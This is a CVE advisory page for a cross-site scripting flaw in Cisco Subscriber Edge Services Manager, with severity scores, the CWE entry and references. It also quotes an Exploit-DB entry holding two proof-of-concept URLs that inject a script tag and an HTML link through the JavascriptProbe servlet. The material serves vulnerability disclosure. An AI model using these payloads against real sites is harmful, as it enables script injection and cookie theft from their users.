CVE-2009-1287 : Detail

CVE-2009-1287

Cross-site Scripting
A03-Injection
0.93%V4
Network
2009-04-13
14h00 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in Cisco Subscriber Edge Services Manager (SESM) allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: some of these details are obtained from third party information.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 32897

Publication date : 2009-04-08 22h00 +00:00
Author : Usman Saeed
EDB Verified : Yes

source: https://www.securityfocus.com/bid/34454/info Cisco Subscriber Edge Services Manager is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. We don't know which versions of Subscriber Edge Services Manager are affected. We will update this BID as more information emerges. http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3Dhttp%253A//host/&browser=explorer&version=6&javascript=1.3& getElementById=true&getElementTagName=true&documentElement=true&anchors=true&regexp=true&option=true&all=true&cookie=true&images=true&layers=false&forms= true&links=true&frames=true&screen=%20true"><script>alert(1);</script>" http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3D%22%3E%3C&browser=explorer&version=6&javascript=1.3&getElem entById=true&getElementTagName=true&documentElement=true&anchors=true&regexp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=true&li nks=true<a%20href%20=%20"http://www.host.net">HTML Injection</a>&frames=true&screen=true&

Products Mentioned

Configuraton 0

Cisco>>Subscriber_edge_services_manager >> Version *

References

http://securitytracker.com/id?1022030
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/34454
Tags : vdb-entry, x_refsource_BID